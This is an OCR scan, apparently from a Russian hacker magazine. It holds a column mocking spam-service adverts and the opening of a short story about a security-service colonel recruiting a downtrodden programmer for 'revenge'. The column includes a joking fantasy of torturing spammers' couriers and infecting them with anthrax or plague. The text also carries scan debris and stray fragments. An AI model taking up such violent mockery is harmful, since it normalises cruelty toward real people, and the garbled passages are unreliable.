За 7 лет работы мы заняли прочную 
позицию на рынке лесопродукции 
и постоянно увеличиваем поставки 
лесоматериалов. Нашими партнерами 
являются крупные деревообрабатыва- 
ющие, целлюлозно-бумажные, метал- 
лургические и другие предприятия. 
«Честность, порядочность, стро- 


гое исполнение обязательств» — вот 
чем мы руководствуемся в нашей ра- 
боте. 


Это по-нашему! Продавать пи- 
ловочный кряж, оцилиндрован- 
ное бревно и всякие-разные пи- 
ломатериалы, древо-щепяные и 
железо-стружечные изделия, 
которые, если верить инструк- 
ции по обращению с туалетной 


бумагой, могут в ней содержаться и выходить наружу при разрыве из- 
делия вне линии перфорации, естественно, поражая место примене- 
ния своими острыми краями. После такого жестокого поражения нам 
будет уже не до честности и порядочности! Будем рассылать спам! 


** 
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Формы оплаты: 

— WebMoney. 

— Через Сбербанк. 

— Банковский перевод для юр. лиц. 

— Наличными в офисе. 

— Наличными через курьера. 

Оперативность: 

— Рассылка стартует на следующий день после оплаты 
— Выезд курьера производится в день обращения или на следующий день. 
Наши приимущества: 

— Обход фильтров 

— Бесплатное изготовление макеты 

— Бесплатный выезд курьера 

— Любые формы оплаты 

— Ежемесячное обновление баз 


Отличное предложение! Крайне бодрит возможность вызова курьера. 

Например, человек, отрицательно относящийся к спаму, 
всегда может сделать ложный заказ, вызвать курьера, стукнуть 
его пыльным мешком по голове, связать, а затем — жечь его утю- 
TOM, рвать на нем волоса, запускать могильных червей ему в нос, 
резать его на части и выпытывать адреса и явки хозяев. А за- 
тем — прямо на следующий день прислать к ним курьера. Или да- 
же нескольких курьеров! 

Кстати, давайте пофантазируем, что можно сделать с курье- 
рами спамеров. Можно незаметно заразить их птичьим гриппом 
или легочной формой сибирской язвы, чтобы они пришли в свой 
подвальный офис, всех заразили и умерли в мучениях. Нет,стоп. 
Лучше сунуть ему в карман несколько вшей, зараженных чумной 
палочкой. Нет, стоп. Это слишком жестоко. Лучше под видом пач- 
ки денег зарядить ему в карман бомбу с трупным ядом? Нет, луч- 
ше не надо. Пойду-ка я пить вечерние таблетки и качать новую 
партию писем читателей © 
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МЭРИ ПОППИНС: 
ПОРОЧАЩИЕ СВЯЗИ 


ПРИКАЗ, КОТОРЫЙ БЫЛ ОТДАН, НАПОМИНАЛ ПРИГОВОР 
NIRO (NIRO@REAL.XAKEP.RU, 
WWW.NIRO-DE-ROBERT.LIVEJOURNAL.COM) 


— Но вы же знаете, товарищ генерал-майор... — смешная попытка 
указать начальству на то, что ход нечестный. 

— Знаю, — ледяной голос не терпел возражений. Лишнее подтвер- 
ждение того, что именно подобным способом они и хотели добиться 
результата. 

— Вы считаете меня способным на такие поступки? — еще одна 
попытка — на этот раз защититься или переложить работу на другого. 
— Именно вы — единственная кандидатура для подобной агентурной 
работы, — генерал сверлил его взглядом. — Наш человек уже проник 
в их логово. Подставить его работу под удар — я не могу. Головы поле- 
тят... А вот найти человека, способного добыть для нас информа- 
цию — тут лучше вас никого не найдешь. 

— Вы и не хотите его искать, товарищ генерал-майор. Это своеобраз- 
ный способ поставить человека на колени... 

— A как вы думаете, полковник, почему так часто обращается внима- 
ние в наших личных делах на порочащие связи? — генерал встал 
из-за стола, подошел вплотную. — Так я вам скажу — чтобы на крючок 
не попадались. У настоящего чекиста должны быть... Ну, не мне вам 
напоминать. 

— Но ведь это не мои связи... — глупая попытка оправдаться. 

— Неважно. У нас так — один раз замазался, в другой раз лучше за- 
стрелись. Вам все ясно, товарищ полковник? 

— Так точно, товарищ генерал-майор! 

— Выполняйте! О результате доложите по форме. 

Полковник Алексей Сергеевич Ткаченко вышел из кабинета по 
красной ковровой дорожке и остановился за дверями. Первая мысль 
была — сделать так, как сказал генерал. Застрелиться. 

Но следом пришла другая. Осознанная. Никаких эмоций. 

— Должно получиться, — сказал он сам себе и твердой походкой на- 
правился в отдел к аналитикам. 


Витя Корнеев всю свою сознательную жизнь плыл по течению. Никог- 
да ни с кем не спорил, не искал правды, не добивался ничего и нигде, 
молча подписывал бумаги, которые решали его дальнейшую судьбу, 
виновато улыбаясь, пытался продать свои программы, вечно что-то 
мямлил себе под нос, спрашивал о том, как жить дальше... 

Ему говорили об этом. Намекали, упрашивали измениться, под- 
талкивали к решительным шагам — бесполезно. Таким тихим, по 
жизни вялым и безынициативным он был всегда — сколько себя 
помнил. Наверное, с детского садика, где его вечно обижали, под- 
ставляли, пинали, отбирали конфеты и игрушки — а он все это тер- 
пел, глупо улыбался и даже почти не плакал. Подумаешь, сломали 
колесо на грузовике? Ну и что, что порвали чуть ли не в клочья ру- 
башку?! Он сносил все. 

Потом случилась школа. И его настигла судьба «ботаника». 
Учился он отлично — просто праздник какой-то. Учителя не могли на- 
радоваться на Витю, ставили всем в пример и выбрали его маму в ро- 
дительский комитет, от чего она была совсем не в восторге. Вот так 
родители несут на себе груз детских талантов — как чемодан без руч- 
ки. И нести неудобно, и бросить жалко. 

Одноклассники рвали его мозги на части — дать списать надо 
было едва ли не половине класса. Успеть решить и свой вариант, и чу- 
жой, да еще и раздать свои черновики всем, кто в них нуждался — за- 
дача, согласитесь, не из легких. И даже если поначалу учился он, в 
принципе, ради знаний — то после первого синяка под глазом от Tex, 
кому он не успел помочь, он стал учиться и ради собственного здоро- 
вья. Обычно это приносит еще большие плоды. 

Не стал исключением и Корнеев. Чтобы не нарываться, он делал 
все, что его просили. Решал контрольные, домашние задания, делал 
лабораторные по физике, потом пришел черед информатики, химии 
и начал высшей математики. Если попытаться посчитать, скольких по- 
тенциальных идиотов он сумел вытолкнуть в большую жизнь, решив 
за них все и вся — то можно сбиться со счета. Он одинаково хорошо 
успевал и по гуманитарным наукам, и по естественным, и по точным. 
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Music and Lyrics by RICHARD М. SHERMAN and ROBERT В. SHERMAN Arranged and Сопдис 
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Любой шепот типа: «Корень, а сколько будет, если вот с этим сло- 
жить? » всегда получал в ответ решение. Витя знал все про интегралы, 
кислоты и щелочи, про теорию относительности построение простей- 
ших алгоритмов, про то, как размножаются хламидомонады, и почему 
генетика раньше была запрещена. 

Такие как Витя всегда есть в каждой школе. Не оскудела еще 
Русь-матушка талантами. Но сколько вокруг присосавшихся к чужому 
дарованию... 

В какой-то момент — ближе к окончанию школы, когда остро 
встал вопрос о выборе профессии — Корнеев понял, что самым удач- 
ным будет путь программиста. И не потому, что он блестяще знал ин- 
форматику в объеме школьного курса, да и дома был с компьютером 
на «ты». Окружающая среда заставила его алгоритмизировать все во- 
круг — в том числе и собственные знания для раздачи налево и напра- 
во. Никто и никогда не получил от него неправильного ответа. Он был 
логичен — до гениальности. 

И куда же еще податься с таким пониманием логики? 

Пожалуй, это был единственный момент в жизни, когда никто не 
взял его за руку и не привел куда-то, куда было нужно. В институт он 
пришел сам. И там он оставался самим собой. 

То есть «ботаником». 

Он писал все и за всех. Правда, тогда он уже научился выделять 
тех, кому стоит помогать, а кому нет — плюс ко всему, наружностью 
он обладал довольно внушительной, а то, что за такой внешностью 
может скрываться тихий и безобидный человек, угадать сразу было 
нельзя. 

Поэтому в институте оказалось немного полегче. Не так много 
нахлебников. Да и принцип того, что дураки все-таки должны вылететь 
из альма-матер, был ему очень близок. И он не мешал им быть теми, 
кто они есть на самом деле — дураками. 

Правда, где-то в глубине души он периодически укорял себя за 
то, что не помог — но эти укоры носили какой-то уж очень рабский ха- 
рактер; он старался от них избавляться, однако школьные корни дава- 
ли о себе знать даже на последних курсах. 

Даже когда его девушка — первая и единственная институтская 
любовь — ушла от него к другому, не такому умному и талантливому, 
но очень компанейскому парню, прекрасно разбирающемуся в клуб- 
ной жизни, музыке и машинах — даже тогда он воспринял это как са- 
мо собой разумеющееся. Словно и не надеялся изначально... 

Наверное, именно тогда он погрузился в компьютеры с головой 
раз и навсегда. Мама поначалу тревожилась — но потом вид сына, все 
время сидящего дома за экраном компьютера или над конспектами ус- 
покоил ee — и она была даже рада происходящему. 

— Ничего, все еще образуется, — говорила она соседкам. — 
Найдется для него и невеста, и друг, и работа... 

И он сидел и ждал. 

Невесту. Друга. Работу. 

Процесс ожидания затянулся на пару лет после получения ди- 
плома. По каким-то причинам его способности никого не впечатли- 
ли — как это всегда было в стране, не любившей талантливых людей. 
Он присел на шею матери по полной программе — но в какой-то мо- 
мент посмотрел на происходящее со стороны, и ему стало стыдно. Тог- 
да первый раз в его голове родилась мысль — заработать денег. 

Но, как и все в своей жизни, делал он это очень тихо и вежливо. 
Писал программы, предлагал их в разные фирмы, выкладывал в ин- 
тернете свои резюме, звонил по объявлениям — безрезультатно. У не- 
го стало складываться впечатление, что он никому не нужен. Этакий 
лузер с красным дипломом, затерявшийся в мире удачно пристроив- 
шихся бездарностей, многих из которых он сам и породил (если 
вспомнить кучу решенных контрольных и написанных школьных сочи- 
нений). Где-то внутри сидело желание выбиться в люди — пробиться, 

прорваться, вылезти наверх... Он по- 
нимал, что может, что даже почти го- 


тов к этому рывку — но что-то остана- 
вливало его перед первым шагом на 


дороге к самореализации. 
В ЕДО М СТ ВУ Его проекты постепенно устаре- 


вали вместе с его желаниями; мама 


il 0 НАДО № ИЛ И С b> давно махнула Ha него рукой; друзей 


не прибавилось. Бывшая «любовь» 


ВАШ м уже родила двойню, работа — та са- 
мая «настоящая» работа — все не на- 


УСЛУГ М клевывалась, зарабатывать приходи- 
лось по мелочам, настраивая ком- 


пьютеры детям «богатеньких Буратино» — тех самых Буратино, кото- 
рым он в свое время писал курсовые за смешное вознаграждение. 

До поры до времени он видел перед собой два пути — первый 
вел в «блистающий мир», второй погружал в себя. Но постепенно ак- 
туальность первого терялась — он переставал думать об успехах и ра- 
довался тому, что имел. Уйдя в свой мир, он наполнил его языками 
программирования, изучая их, как киберполиглот — просто потому, 
что это было интересно. Поняв один, он уже не спотыкался на дру- 
гих — несмотря на некоторые явные противоречия, ибо даже в них он 
видел логику. 

Мир сузился — так можно выразить образ жизни Вити Корнеева 
до того момента, который является началом этого повествования. Су- 
зился, словно зрачок в ответ на луч света. Сузился, чтобы не впустить 
внутрь ничего лишнего — и никого. Минимум знакомых — и, как след- 
ствие, минимум врагов и завистников. Ни одной потенциальной зацепки 
на предмет трудоустройства — и никаких комплексов по этому поводу. 

И это при его, Вити Корнеева, огромной трудоспособности, гени- 
альности и желании вырасти в нечто большее — вот только желание 
погасло еще где-то на уровне института. Точнее сказать, оно тепли- 
лось в его душе, словно лучина — вспыхивая временами в ответ на 
особенно удачно написанные им программы и угасая, когда покупате- 
лей найти не удавалось... 

В один из таких дней — когда лучина переставала потрескивать 
и готова была погаснуть на неопределенный срок, Витя Корнеев вы- 
шел из своей квартиры, промычав маме что-то неопределенное в от- 
вет на вопрос о сроках прогулки. Его в очередной раз кинули — база 
данных, написанная им для одного солидного, как Вите самому каза- 
лось, учреждения, была самым наглым способом украдена — безо 
всякого намека на гонорар. Программиста оставили явно с носом, на- 
обещав «золотые горы». 

Корнеев понимал, что виноват сам — он своими собственными 
руками не внес в программу никаких ограничений, решив показать за- 
казчику ее работу во всей красе и мощи. Процесс показа явно кто-то 
отслеживал — потому что спустя некоторое время база данных уже 
работала, а с выплатой гонорара фирма не торопилась. Витя чертых- 
нулся на себя, понимая, что такие демонстрации надо производить на 
ноутбуке, а не на компьютере того, для кого все это предназначено, 
но денег на ноутбук у него не было и в обозримом будущем им ниотку- 
да было взяться. Программу сперли, пока он с горящими глазами 
объяснял принцип ее работы. Сперли с диска, выслушали его коммен- 
тарии, красиво отказали — якобы не подходит, и выставили за дверь, 
попросив доработать. Он доработал, позвонил — но база данных уже 
была не нужна. Как и сам Витя Корнеев. 

Его использовали. Впрочем, далеко не впервые. Подобным обра- 
зом с ним обходились и раньше. Несколько раз. Кидали на деньги. Во- 
ровали мысли и идеи. Выдавали себя за истинных авторов — Корнеев 
просто не успевал подать все нужные документы для присвоения ав- 
торских прав. 

В общем, воровство интеллектуальной собственности процвета- 
ло не только на рынке «пиратских» дисков, но и в сфере программиро- 
вания — и Витя Корнеев был типичным лохом из этой группы постра- 
давших. 

Понимая, но не в силах изменить ничего, Витя вышел из подъез- 
да и двинул в парк рядом с домом — там он любил проводить свобод- 
ное время, которого у него, как у человека, работающего от случая к 
случаю, было всегда навалом. 

Стояла тихая ранняя осень, деревья еще путали зеленые листья 
с желтыми и сбрасывали временами не те, и от этого под ногами цари- 
ла неподражаемая мозаика. Корнеев, сунув руки в карманы куртки 
и втянув голову в плечи, потихоньку разгребал эту красоту ногами, 
двигаясь к намеченной цели — скамейке в конце центральной аллеи. 

Мимо пробегали спортсмены, шмыгали из стороны в сторону со- 
баки, на других лавочках сидели редкие парочки, прижавшись друг к 
другу. Корнеев не обращал внимания ни на первых, ни на вторых, 
ни на третьих — шел себе и шел, пиная листву и пустые пластиковые 
бутылки. В голове метались какие-то команды, выстраивались 
и тут же рушились схемы алгоритмов, он не видел вокруг себя ничего, 
что было достойно его внимания. 

Скамейка, как всегда, была пуста. Неудивительно — рядом про- 
легали трамвайные пути, всегда было довольно шумно, здесь не лю- 
били появляться ни собаководы, ни влюбленные. Зато Корнеев обо- 
жал это место — он разглядывал походящих за решетчатым забором 
людей, рассматривал проезжающие машины и трамваи и думал, ду- 
мал... 


Забирался на скамейку он всегда с ногами — пусть это выгляде- 
ло очень по-детски, даже некультурно и невоспитанно, но зато удобно 
и высоко. Собаки пробегали мимо, не обнюхивая его ноги, а сделать 
замечание ему в этом углу парка было некому. Так что идеальнее ме- 
ста для наблюдений и размышлений было не найти. 

В очередной раз взгромоздившись на спинку лавочки, Витя заки- 
нул ногу на ногу и, прищурившись, взглянул на все еще по-сентябрь- 
ски яркое осеннее солнце. В носу защипало, из уголков глаз выдави- 
лись слезы; захотелось чихнуть. 

Несколько мгновений Корнеев сопротивлялся солнцу — пытался 
адаптироваться, пытался найти такой угол зрения, чтобы можно было 
не прикрывать глаз... Слезы уже лились ручьем, когда он услышал от- 
куда-то сбоку: 

— Я где-то читал, что так тренируют биатлонистов. 

Витя вздрогнул и уже не смог удержаться — пришлось чихнуть 
раз пять-шесть, пока он смог разглядеть сквозь слезящиеся глаза то- 
го, кто это сказал. Напротив него стоял уже очень немолодой мужчина 
профессорского вида — кепка, из-под кепки суровый пронзительный 
взгляд, борода, серое пальто, в правой руке портфель, в левой зачем- 
то длинный зонтик-трость. 

— Как? — спросил Витя, не понимая, чего этот профессор остановил- 
ся рядом с ним и рассматривает его, словно под микроскопом. 

— Они смотрят на сильный источник света, имитирующий блеск бело- 
го снега, — пояснил мужчина, поставив портфель рядом с ногами Кор- 
неева и опершись на зонтик. — Смотрят и учатся его не видеть. 

Ведь они должны точно стрелять в любую погоду — а в солнечную 

это не менее сложно, чем в туман или во время снегопада. 

— Вы уверены? — Корнеев достал из кармана платок, вытер слезы, 
шмыгнул носом и машинально отодвинулся от неожиданного собесед- 
ника. — Как-то не очень верится. 

— По большому счету, мне тоже, — хмыкнул тот в ответ. — Желтая 
пресса на многое способна — только денег дай. Я думаю, что биатло- 
нисты — да и стрелки вообще — глаза берегут, как футболисты и бе- 
гуны — ноги. Слепые стрелки никому не нужны. А такие упражнения 
чреваты серьезными последствиями для сетчатки. 

— А вдруг я именно биатлонист? — осмелел Корнеев. — И это все — 
правда? 

Человек, похожий на профессора, засмеялся — искренне, 
всплеснув руками и наклонив голову на бок. 

— Не смешите, молодой человек! — он следом за Корнеевым вытер 
слезы, но не платком, а рукавом, чем автоматически нарушил весь ан- 
тураж солидности, после чего в одно мгновенье вскочил на лавочку 

и присел рядом с Витей. — Вы? Вы никогда в жизни спортом не зани- 
мались! 

— Откуда вы знаете? — спросил Корнеев, а сам подумал: «С зонтиком 
— как Мэри Поппинс. Мужского рода». 

— Отсюда, — тот ткнул в ответ концом зонта-трости в портфель. — 
Там есть про вас практически все. По меньшей мере, за последние лет 
десять. А уж насчет занятий спортом — едва ли не с детства. 

Корнеев посмотрел на загадочный портфель, потом на мужчину 
и уже хотел было что-то спросить, но грохочущий за забором трамвай 
отвлек его. А когда шум стих, мужчина представился: 

— Ткаченко Алексей Сергеевич, по виду профессор, а на самом деле 
нет, — он улыбнулся и уточнил: 
— Вы ведь именно это хотели спросить, уважаемый Виктор Корнеев? 

Витя, немного ошалевший от такой прозорливости и OT волшеб- 
ного портфеля с информацией о нем с самого детства, молча кивнул. 
— Понимаете, Виктор, ведомство, в котором я имею честь служить, 
не располагает профессорскими званиями. Там в ходу несколько 
иные... Но это неважно. Совсем неважно. 

Он постучал зонтиком по портфелю, словно подбирая слова. 

— Этому ведомству понадобились ваши услуги... — Алексей Сергее- 
вич повернулся к Вите и взглянул ему в глаза. — То есть не просто ус- 
луги в той области, которая знакома вам в совершенстве, а именно ва- 
ши. Мы наслышаны о том, какие вещи вы умеете делать... Мы видели 
результаты ваших трудов. Парочкой мы даже пользуемся, не обессу- 
дьте — правда, получилось это опосредованно, наша контора заинте- 
ресовалась теми фирмами, которым вы предлагали свои... Свои нара- 
ботки... И после того, как эти фирмы были нами благополучно ликви- 
дированы вследствие их незаконной предпринимательской деятельно- 
сти, некоторые программные продукты, которыми они пользовались, 
попали в наши руки. И в этих программах мы нашли упоминания о вас, 
молодой человек, как об их авторе. Но почему-то мне кажется, что вы 
вставляли свои данные в раздел «О программе» явно не из пустого 


хвастовства. Скажите, вы гор- 
дитесь своими творениями? 

Корнеев слушал все это, 
едва не падая со скамейки. 
Алексей Сергеевич нигде явно 
не озвучил название своего 
ведомства, в котором нет про- 
фессорских званий, но суть 
Витя схватил сразу. «Безопас- 
ность» во всех ее проявлениях 
так и бросалась в глаза от се- 
рого пальто и портфельчика с 
досье. 
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зу, Ткаченко переспросил. Витя вздрогнул и утвердительно кивнул. 

— Ятак и думал, — сказал Алексей Сергеевич. — Вы, безусловно, до- 
стойны того, чтобы ваши программы пользовались заслуженным 
спросом. Правда, я сам не особенно разбираюсь в тонкостях... Воз- 
раст уже не тот, начинать поздно. Но у меня и роль другая — ни в коем 
случае не оценивающая. 

Корнеев зябко передернул плечами: 

— Акакая тогда? 

— Роль дона Корлеоне, — совсем не солидно шмыгнул носом Ткачен- 
ко. — Хотя, думаю, вы сравнили меня с Мэри Поппинс... Надо же, уга- 
дал, — усмехнулся он, увидев смущение на лице Вити. 

— Вы извините, но... А как вы догадались? 

— Нас учат... Я ведь старый солдат, хороший физиономист, опреде- 
ляю перепады настроения и направление мыслей... Да не пугайтесь, 
Витя, читать их напрямую я пока не научился — да и в портфеле 
устройства для чтения мыслей тоже нет. Не придумали пока. А если вы 
и слышали что, не верьте — байки очередные... 

— Как же, вы признаетесь, — Корнеев недоверчиво ухмыльнулся. — 
В вашем ведомстве всегда все отрицают — даже когда уже и отри- 
цать-то смешно. 

— На том и стоим, — кивнул Ткаченко. — И уже много лет. Пока никто 
не жаловался. А если кто и успел — то... 

— Дальше не надо, — оборвал его Витя. — Не надо. А иначе потом 
все, что мне останется — это перелезть через забор и броситься 

под трамвай. Чтобы вместе со мной умерли все ваши тайны. 

Ткаченко изогнул дугой свои седые брови, недоверчиво произ- 
нес: 

— Авы не такой уж и рохля, как написано в нашем досье... Между npo- 
чим, наши специалисты ошибаются довольно редко. Наверное, стоит 
копнуть вас чуть поглубже — но потом, потом. Давайте так — если 
что-то покажется вам чересчур угрожающим, то вы после предложен- 
ной мной работы сами придете сюда, перелезете через этот забор, 

и первый же трамвай ваш. Поиграем в Берлиоза. Договорились? 

Корнеев молчал. Его собеседник явно в карман за словом не 
лез. Стоило брякнуть глупый детективный штамп на тему «свидетелей 
не оставляют в живых», как Ткаченко поставил его на место — отно- 
сясь к его словам совершенно серьезно. 

— Договорились... — невесело ответил Витя. — Может, тогда сразу 
о работе? Раз насчет трамвая уже все решили? 

Алексей Сергеевич пристально посмотрел на Витю, задержав 
взгляд почти на минуту. Он буквально ввинчивался в его мозг, будто 
бы пытаясь понять сущность человека, который вдруг не полностью 
уложился в их стройную схему. Глаза Ткаченко притягивали к себе, за- 
ставляя Витю смотреть в них, как до этого он смотрел на солнце — аж 
до слез. И только когда первая слеза вытекла из угла глаза у Корнее- 
ва — Ткаченко отвел взгляд, тихонько кашлянул, покачал головой 
и пододвинул портфель к себе поближе. 

Щелчок замка был довольно громким. Портфель раскрылся, как 
раковина моллюска. Внутри был ноутбук и что-то еще — какие-то пап- 
ки, пара тетрадей и какой-то приборчик, напомнивший Корнееву ста- 
рый калькулятор МК-60. Ткаченко посмотрел внутрь, потер ладони, 
как человек, увидевший нечто крайне аппетитное, после чего сунул 
руку внутрь... 

Корнееву казалось, что к своему портфелю Алексей Сергеевич 
относится как к капкану. А иначе зачем было так осторожно продви- 
гать пальцы к раскрытой пасти и так быстро выдергивать их наружу — 
но уже вместе с какой-то тетрадью? Витя сам вздрогнул — ему уже на- 
яву почудилось, как портфель захлопывается, чтобы не дать руке вы- 
хватить эту самую тетрадь. 
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Тем временем Алексей Сергеевич на мгновенье застыл с тетра- 
дью над портфелем, точно проверяя — не захлопнет ли тот свою хищ- 
ную пасть? (В этот момент Корнеев подумал, что кто-то из них сейчас 
страдает очень интересной формой помутнения рассудка — но вот 
кто, понять было невозможно...). Спустя секунду Ткаченко разогнул- 
ся, положил тетрадь себе на колени и вздохнул. 

— Спина? — спросил Витя, решив, что единственное объяснение тако- 
го странного поведения. — Радикулит? 

Алексей Сергеевич непонимающе повернул к нему голову, по- 
том снова посмотрел на портфель, задумался, но ненадолго, а потом 
вдруг просиял весь, словно сообразив, о чем речь, и закивал — бы- 
стро и как-то неестественно. 

— Да, Витя, да, — потер он свободной рукой поясницу. — 

Иногда бывает... 

— И как же ваша контора? Вам по возрасту на пенсию уж пора дав- 
но, — совершенно искренне спросил Корнеев. — Да еще с больной 
спиной... У меня было как-то раз — на лестнице споткнулся и чего-то 
там потянул... Боль ведь жуткая! 

— Правильно, — кивнул Ткаченко. — Все правильно. Но в нашем ве- 
домстве, сам понимаешь, не все так просто... далеко не все. И давай 
пока не будем обо мне. Есть дела поважнее. 

Он крутанул туда-сюда головой, потом всем телом, прислушался 
к своим ощущениям и в целом остался доволен. 

— Будем живы — не помрем, — завершил он диалог о здоровье. — 
А теперь слушайте, Виктор... 

Он раскрыл тетрадь, немного пошуршал страницами, потом как- 
то не по образу воровато обернулся и сказал: 

— Над вашим досье работали лучшие психологи нашего отдела. Луч- 
шие, Виктор. Мы изучили вас... Точнее, изучили они — но сих легкой 
руки и я. Нам известны ваши положительные и отрицательные сторо- 
ны; мы знаем всех ваших друзей и знакомых... Да, да, вы сейчас ска- 
жете, что друзей у вас нет — но это ложь. Я могу привести две-три фа- 
милии в пример, и вы поймете, что эти люди ваши друзья — хотя бы 
потому, что они никогда не желали вам зла... 

Корнеев очень хотел спросить, кого же имеет в виду Ткаченко, 
но побоялся — тетрадь, раскрытая примерно посередине, пугала его, 
как дневник с двойкой в руках у мамы. 

— Я вообще люблю говорить загадками, Виктор, — усмехнулся Алек- 
сей Сергеевич. — Вопрос написан у вас на лбу — но пока He задавай- 
те его. Попытайтесь понять без моей помощи... Ведь вполне может 
быть, что ваши критерии дружбы немного искажены? 
— Да, наверное, — пожал плечами Витя, то ли соглашаясь, то ли вооб- 
ще не понимая, о чем речь. Но Ткаченко произвел на него впечатле- 
ние человека, которому надо верить — причем в обязательном поряд- 
ке. Иначе произойдет что-нибудь невероятное... 
— Иятак думаю, — удовлетворился этой не вполне очевидной фор- 
мой ответа Алексей Сергеевич. — Изучив ваше досье, я понял, что 
искажены не только критерии дружбы — вы смотрите на всю свою 
жизнь под несколько иным углом, нежели окружающие вас люди. Вы 
живете перпендикулярно течению жизни — и о каждого нового чело- 
века, что встречается вам на пути, вы спотыкаетесь, как о малень- 
кую ступеньку... 
— Авы — параллельно? — спросил Витя, который впервые слышал о 
подобном взгляде на его 
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встречного, но, в отличие от вас, делаю это очень грамотно, аккуратно 
и незаметно. Я не перпендикуляр и не параллель, Виктор. Я касатель- 
ная. У меня всегда есть точка соприкосновения. С каждым. Мне до 
всего есть дело — но для меня не существует ступенек, ни больших, 
ни маленьких. В крайнем случае — длинная, практически бесконечная 
лестница... 
— Вверх? — задал вопрос Корнеев — больше просто для поддержа- 
ния разговора, ибо он почувствовал, что задел какую-то очень болез- 
ненную для Ткаченко струну. 
— Вверх, вниз — какая к черту разница!.. — отмахнулся Алексей Сер- 
геевич, и вдруг замолчал, словно впервые задумался над тем, куда же 
ведет его эта самая лестница. — В приказном порядке прекращаем 
эту философию, — зло посмотрел он на Корнеева. — Вернемся к 
досье. Признаюсь честно, мне оно не понравилось — ни в чистом ви- 
де, ни с комментариями психологов. 

Корнеев подышал на озябшие ладони, попытался улыбнуться: 
— Вы меня сейчас будете вербовать? 
— Виктор, если еще раз меня перебьете — мы будем разговаривать в 
служебном кабинете. И там уже не будет спасительного трамвая. Поэ- 
тому замолчите и открывайте рот только в одном случае — если я вас 
о чем-то спрошу. 
— Договорились, — кивнул Корнеев. Он понял, что перегнул палку — 
и машинально подчинился резко помрачневшему собеседнику. На Мэ- 
ри Поппинс тот уже не был похож даже отдаленно. 
— Итак — ваш психологический портрет крайне прост. Вы — неудач- 
ник, — Ткаченко сказал это так, что Витя сразу в это поверил. Он, ко- 
нечно, где-то в глубине души понимал, что жизнь не совсем удалась, 
но только после слов Алексея Сергеевича убедился в этом оконча- 
тельно. — Вы человек, который умудрился свои светлые мозги сде- 
лать каким-то балластом и еще как-то пытается держаться на плаву. 
Поверьте, вам не долго осталось. 
— До чего? — Корнеев удивился. 
— До морального разложения. До деградации. Скажем так, до стака- 
на. Еще пара-тройка лет — и вы уйдете; сначала в себя, потом в пси- 
хиатрическую лечебницу. Будете лечить хронический алкоголизм. 
Правда, с нашим уровнем медицины лечить вы его будете не очень 
долго — умрете от цирроза. 
— Весело, — Витю даже передернуло. — Я — неудачник. Здорово. А 
если мне так не кажется? 
— Послушайте, сколько ваших программ было куплено за последние 
два года? — ехидно спросил Ткаченко, зачем-то похлопав по тетради, 
и Корнеев понял — врать бесполезно. Там все записано. 
— Две, — честно сказал он. — Но это были хорошие программы. 
И деньги, в общем-то... 
— Хорошие, плохие — наплевать. Две. По одной за год. Потрясающий 
результат. Вы потенциальный алкоголик, Корнеев. Вы это понимаете? 
— Нет, — честно признался Витя, который выпивал в своей жизни нес- 
колько раз. — А вы хотите спасти меня от этого? 
— Если так будет угодно — да. Я готов принять любую ВАШУ версию 
— ибо моя версия останется при мне. И знаете, чем дальше я веду эту 
беседу, тем мне все интереснее — а что же у нас с вами получится на 
выходе? От вас в принципе можно получить хоть какой-то КПД? 
— Наверное... Ведь вы же здесь — значит, кто-то просчитал 
эту вероятность. 
— Кто-то... Я бы сюда точно не пришел, но... Приказ, знаете ли, — 
Ткаченко прикусил губу. — Продолжим. Итак — вы неудачник. Друзей 
мало — и что хуже всего, вам они практически неизвестны. Врагов — 
нет, ибо у медузы их быть не может по определению... Две программы 
за два года — остальные у вас просто украдены, если вы до сих пор не 
поняли и пытались найти этому какое-то другое объяснение. Ни семьи 
— за исключением мамы, ни своей квартиры, ни потенциальной же- 
ны... Ни-че-го. И вот на фоне всего этого — оглянитесь, Виктор! А 
жизнь-то у других удалась! 
— Не может быть, — как-то вяло пытался добавить долю иронии в это 
бичевание Корнеев, но у него не получилось — Ткаченко его даже не 
услышал, продолжая: 
— И знаете, вот в этой тетради — а вы-то, небось, подумали, что это 
досье на вас — собрана информация о двадцати четырех людях, кото- 
рых вы своими руками протолкнули к светлому будущему. Восьмерым 
из них вы помогли закончить школу с хорошими оценками, осталь- 
ным — институт. Их уровень интеллекта несравнимо ниже вашего — 
в этом нет никакого сомнения. Но среди них есть и успешные военные 
(не тупые солдафоны, а люди с положением), и несколько бизнесме- 
нов с широким размахом, и даже два человека, занимающие высокие 


посты в банковской сфере. Каждому из них вы в свое время прикрыли 
задницу — не дали получить двойку на экзамене, помогли сдать заче- 
ты, курсовые и прочую студенческую белиберду. В итоге они стали те- 
ми, кем стали. А кто теперь вы? 

Корнеев пожал плечами. Единственное, с чем он был не согла- 
сен — это с количеством людей, в свое время хапнувших изрядную до 
лю его интеллекта. Оно было на порядок больше. Внезапно на Витю 
нахлынули ранее не испытанные чувства, и ему срочно захотелось на- 
хамить кагебешнику. 

— Что вы тут меня лечите? — неожиданно для самого себя взвизгнул 
он и тут же испугался собственного голоса — получилось абсолютно 
не солидно. Ткаченко удивленно посмотрел на Корнеева, рассмеялся 
и прокомментировал: 

— Это вообще не ваше. Не звучит из ваших уст такая чушь, ну хоть 
режьте меня. Лечить вас никто не собирается. Давно известно, что это 
бесполезно. Я просто пришел предложить вам... 

И тутон замолчал — словно не был готов произнести то слово, 
что вертелось у него на языке. Витя немного напрягся; говорить боль- 
ше ничего не хотелось — голос мог в очередной раз сыграть с ним 
злую шутку. Алексей Сергеевич же производил впечатление челове- 
ка, который борется сейчас со своей совестью — и одновременно 
с этим человека, у которого совести нет, и никогда не было. Он погла- 
живал тетрадку, хмурил лоб и наконец выдавил из себя: 

— Я пришел предложить вам месть. 

— Месть? — на этот раз получилось очень хрипло. — Какую? Кому? 
— Вам решать, — Ткаченко развел руками и едва не уронил досье. — 
Давайте откроем тетрадку и ткнем пальцем в первого попавшегося... 
— Простите, не понял, — вскочил со скамейки Корнеев и отбежал 

на пару шагов — но увидел, что это выглядит очень трусливо, и оста- 
новился. — Кому это я должен мстить? И за что? 

— За бесцельно прожитые годы — если помните Островского, — 
Ткаченко не пытался его остановить, словно был уверен, что Витя 
никуда не денется. — За ваше теперешнее положение, не идущее 

ни в какое сравнение с положением тех, кто стал выше вас благодаря 
вашим мозгам. 

— Я что-то в толк не возьму — это новая функция органов безопасно- 
сти? — нахмурился Корнеев. Все происходящее стало ему крайне не- 
приятно — хотя и до этого предложения Ткаченко веселым этот разго- 
вор назвать было нельзя. — Вы пришли сюда, чтобы помочь мне отом- 
стить? Что за странные услуги оказывает ваша контора! 

